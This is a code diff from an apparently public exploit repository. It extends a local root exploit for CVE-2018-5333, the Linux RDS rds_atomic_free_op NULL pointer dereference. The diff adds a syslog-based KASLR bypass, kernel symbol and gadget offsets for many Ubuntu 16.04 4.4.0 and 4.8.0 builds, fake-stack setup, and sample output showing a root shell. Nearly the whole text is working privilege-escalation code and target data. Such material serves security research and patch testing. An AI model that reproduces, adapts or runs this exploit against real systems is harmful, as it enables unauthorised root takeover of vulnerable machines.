Add syslog KASLR bypass and offsets for 4.8.0 kernels

Author: bcoles

CVE-2018-5333/cve-2018-5333.c

@@ -1,8 +1,11 @@
-// Local root exploit for rds_atomic_free_op NULL pointer dereference
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
 // in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
 //
 // Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
-// Targets: Ubuntu 4.4.0 kernels <= 4.4.0-116-generic #140-Ubuntu SMP.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic #140-Ubuntu
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic #57~16.04.1-Ubuntu
 //
 // The rds kernel module is not loaded by default on Ubuntu.
 // - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
@@ -30,11 +33,15 @@
 // - check if system supports RDS sockets
 // - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
 //   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
-// - spender's /proc/kallsyms and /boot/System.map KASLR bypasses
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - spender's /boot/System.map KASLR bypass (requires readable System.map file)
 //   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
 //
-// Shoutouts to nstarke for adding additional kernel offsets.
-// - https://github.com/bcoles/kernel-exploits/pulls?q=is%3Apr+author%3Anstarke
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
 //
 // This exploit also uses various code patterns copied from:
 // - xairy's exploits:
@@ -44,6 +51,7 @@
 // ---
 // $ gcc cve-2018-5333.c -o cve-2018-5333
 // $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root
 // [.] starting
 // [.] checking kernel version...
 // [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
@@ -54,12 +62,18 @@
 // [~] done, mapped null address
 // [.] KASLR bypass enabled, getting kernel addr
 // [.] trying /proc/kallsyms...
-// [.] trying /boot/System.map-4.4.0-116-generic...
-// [-] open/read(/boot/System.map-4.4.0-116-generic)
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying /boot/System.map-4.4.0-116-lowlatency...
+// [-] open/read(/boot/System.map-4.4.0-116-lowlatency)
+// [.] trying syslog...
+// [-] kernel base not found in syslog
 // [.] trying mincore info leak...
-// [.] done, kernel text:   ffffffff81000000
-// [.] commit_creds:        ffffffff810a4cf0
-// [.] prepare_kernel_cred: ffffffff810a50e0
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 402119...
 // [+] got root
 // # id
 // uid=0(root) gid=0(root) groups=0(root)
@@ -77,6 +91,7 @@
 #include <string.h>
 #include <stdint.h>
 
+#include <sys/klog.h>
 #include <sys/mman.h>
 #include <sys/types.h>
 #include <sys/socket.h>
@@ -101,6 +116,7 @@
 #define ENABLE_SYSTEM_CHECKS 1
 #define ENABLE_KASLR_BYPASS  1
 
+// Can be overwritten by argv[1]
 char *SHELL = "/bin/sh";
 
 // Will be overwritten if ENABLE_KASLR_BYPASS
@@ -129,13 +145,39 @@ struct kernel_info kernels[] = {
   { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
   { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
   { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
 };
 
 // * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
 // https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
 
 #define RAND_SIZE 4096
 
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+
 void trigger_bug()
 {
   struct sockaddr_in sin;
@@ -303,10 +345,11 @@ struct utsname get_kernel_version() {
 }
 
 #define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+#define KERNEL_VERSION_SIZE_BUFFER 512
 
 void detect_versions() {
   struct utsname u;
-  char kernel_version[512];
+  char kernel_version[KERNEL_VERSION_SIZE_BUFFER];
 
   u = get_kernel_version();
 
@@ -321,7 +364,7 @@ void detect_versions() {
   }
 
   char *u_ver = strtok(u.version, " ");
-  snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+  snprintf(kernel_version, KERNEL_VERSION_SIZE_BUFFER, "%s %s", u.release, u_ver);
 
   int i;
   for (i = 0; i < ARRAY_SIZE(kernels); i++) {
@@ -332,7 +375,7 @@ void detect_versions() {
     }
   }
 
-  dprintf("[-] kernel version not recognized\n");
+  dprintf("[-] kernel version '%s' not recognized\n", kernel_version);
   exit(EXIT_FAILURE);
 }
 
@@ -363,6 +406,8 @@ unsigned long get_kernel_addr_kallsyms() {
     }
     if (!strcmp(name, sname)) {
       fclose(f);
+      if (addr == 0)
+        dprintf("[-] kernel base not found in %s\n", path);
       return addr;
     }
   }
@@ -412,6 +457,75 @@ unsigned long get_kernel_addr_sysmap() {
   return 0;
 }
 
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+// https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+int mmap_syslog(char** buffer, int* size) {
+  *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+    return 1;
+  }
+
+  *size = (*size / getpagesize() + 1) * getpagesize();
+  *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+  *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+  if (*size == -1) {
+    dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+    return 1;
+  }
+
+  return 0;
+}
+
+unsigned long get_kernel_addr_syslog_xenial(char* buffer, int size) {
+  const char* needle1 = "Freeing unused";
+  char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+  if (substr == NULL)
+    return 0;
+
+  int start = 0;
+  int end = 0;
+  for (start = 0; substr[start] != '-'; start++);
+  for (end = start; substr[end] != '\n'; end++);
+
+  const char* needle2 = "ffffff";
+  substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+  if (substr == NULL) {
+    return 0;
+  }
+
+  char* endptr = &substr[16];
+  unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+  r &= 0xfffffffffff00000ul;
+  r -= 0x1000000ul;
+
+  return r;
+}
+
+unsigned long get_kernel_addr_syslog() {
+  unsigned long addr = 0;
+  char* syslog;
+  int size;
+
+  dprintf("[.] trying syslog...\n");
+
+  if (mmap_syslog(&syslog, &size))
+    return 0;
+
+  addr = get_kernel_addr_syslog_xenial(syslog, size);
+
+  if (!addr)
+    dprintf("[-] kernel base not found in syslog\n");
+
+  return addr;
+}
+
 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
 // https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
 
@@ -467,6 +581,9 @@ unsigned long get_kernel_addr() {
   addr = get_kernel_addr_sysmap();
   if (addr) return addr;
 
+  addr = get_kernel_addr_syslog();
+  if (addr) return addr;
+
   addr = get_kernel_addr_mincore();
   if (addr) return addr;
 
@@ -503,6 +620,7 @@ void fork_shell() {
 
 int main(int argc, char *argv[]) {
   if (argc > 1) SHELL = argv[1];
+  dprintf("Linux RDS rds_atomic_free_op NULL pointer dereference local root\n");
 
   dprintf("[.] starting\n");
 
@@ -537,6 +655,8 @@ int main(int argc, char *argv[]) {
   dprintf("[.] commit_creds:        %lx\n", commit_creds);
   dprintf("[.] prepare_kernel_cred: %lx\n", prepare_kernel_cred);
 
+  dprintf("[.] mmapping fake stack...\n");
+
   uint64_t page_size = getpagesize();
   uint64_t stack_aligned = (xchg_esp & 0x00000000fffffffful) & ~(page_size - 1);
   uint64_t stack_offset = xchg_esp % page_size;
@@ -587,6 +707,9 @@ int main(int argc, char *argv[]) {
   fake_stack[i++] = (unsigned long)(temp_stack + 0x500000);
   fake_stack[i++] = user_ss;
 
+  dprintf("[~] done, fake stack mmapped\n");
+
+  dprintf("[.] executing payload %lx...\n", (unsigned long)shell);
   trigger_bug();
 
   return 0;